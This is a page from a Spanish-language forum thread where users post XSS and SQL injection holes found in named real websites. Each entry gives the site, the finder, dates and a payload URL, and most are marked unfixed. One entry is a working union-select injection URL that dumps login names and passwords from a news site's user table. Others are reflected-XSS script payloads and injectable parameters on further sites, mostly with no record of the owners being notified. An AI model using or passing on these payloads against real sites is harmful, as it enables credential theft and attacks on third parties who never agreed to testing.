Recopilatorio de Vulnerabilidades de XSS/SQLinjection

Iniciado por sirdarckcat, 26 Mayo 2008, 03:50 AM

0 Miembros y 3 Visitantes están viendo este tema.

Imprimir
Ir Abajo Páginas 1 2 3 4 5 6
Acciones del Usuario

franco_tuv

#40
23 Julio 2011, 18:27 PM
Sitio web: http://www.elpais.cr
Descubridor: franco_tuv
Fecha de descubrimiento: 22 de Julio del 2011
Fecha de notificación: 22 de Julio del 2011
Fecha de publicación: 23 de Julio del 2011
Arreglado : No
Información adicional:
Código [Seleccionar]
SQLI
http://www.elpais.cr/galerias.php?id=-1+union+select+1,group_concat%28login,0x3a,password%29+from+406060_elpais.usuarios--

daryo

#41
13 Mayo 2013, 14:19 PM
Sitio web: http://rebelion.org
Descubridor: daryo
Fecha de descubrimiento: 12 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Citar
XSS
http://rebelion.org/mostrar.php?id=%3Cscript%3Ealert%28/a/%29%3C/script%3E&submit=Buscar&inicio=1&tipo=3

PD:reviviendo el post XD
buenas

daryo

#42
13 Mayo 2013, 14:21 PM
Sitio web: http://www.szkolamarzen.pl
Descubridor: daryo
Fecha de descubrimiento: 20 mayo 2012
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:

Código [Seleccionar]
sqli
http://www.szkolamarzen.pl/gim/newsone.php?id=
buenas

daryo

#43
13 Mayo 2013, 14:24 PM
Sitio web: http://www.worstpreviews.com
Descubridor: daryo
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código [Seleccionar]

sqli
http://www.worstpreviews.com/review.php?id=600
buenas

daryo

#44
13 Mayo 2013, 14:31 PM Ultima modificación: 13 Mayo 2013, 14:35 PM por daryo

Insertar Cita
Sitio web: http://www.eventdirect.ca
Descubridor: seguro alguien antes que yo :P
Fecha de descubrimiento: la verdad ni recuerdo
Fecha de notificación: xxxxx
Fecha de publicación: xxxx
Arreglado : No
Información adicional:
Código:
Código [Seleccionar]

sqli
http://www.eventdirect.ca/game.php?ID=62
buenas

cachacko

#45
9 Septiembre 2013, 04:53 AM




Nunca he visto esto. Muy interesante.



Hazama

#47
4 Mayo 2014, 23:50 PM Ultima modificación: 5 Mayo 2014, 01:56 AM por Tatsurou_LuLu
Sitio web:http://www.espanol.manutd.com/
Descubridor:The BlacK DiamOnD
URL del aviso: --
Fecha de descubrimiento: 2013
Fecha de notificación:24/11/13
Fecha de publicación: --
Arreglado: Si
Vulnerabilidad: XSS
Información adicional:Aunque Esta vulnerabilidad haya sido supuesta mente arreglada,aun sigue existiendo solo que incluyendo código HTML en vez de javascript.

Código (javascript) [Seleccionar]
<script>alert("XSS");</script> &
Código (html4strict) [Seleccionar]
<h1>xss</h1>

Hazama

#48
5 Mayo 2014, 01:53 AM Ultima modificación: 5 Mayo 2014, 01:57 AM por Tatsurou_LuLu
Sitio web:http://blog.com.es/
Descubridor:The Black DiamOnD
URL del aviso:http://bugs.blog.co.uk/2014/05/04/html-xss-bug-18373598/
Fecha de descubrimiento: 04/05/2014
Fecha de notificación:04/05/2014
Fecha de publicación:04/05/2014
Arreglado: --
Vulnerabilidad: XSS reflejado
Informacion adicional:Blog Personal

Código [Seleccionar]
http://support.blog.co.uk/search/%253Ch1%253EHOLA%2BMUNDO%253C%252Fh1%253E/AND/

Ceh

#49
12 Junio 2014, 08:30 AM
[youtube=640,360]C2VmExPbU5A[/youtube]

PETROLERA MAS POPULAR EN PERU

BY Security : Peruano y Muy PICHULON  ;D
Imprimir
Ir Arriba Páginas 1 2 3 4 5 6
Acciones del Usuario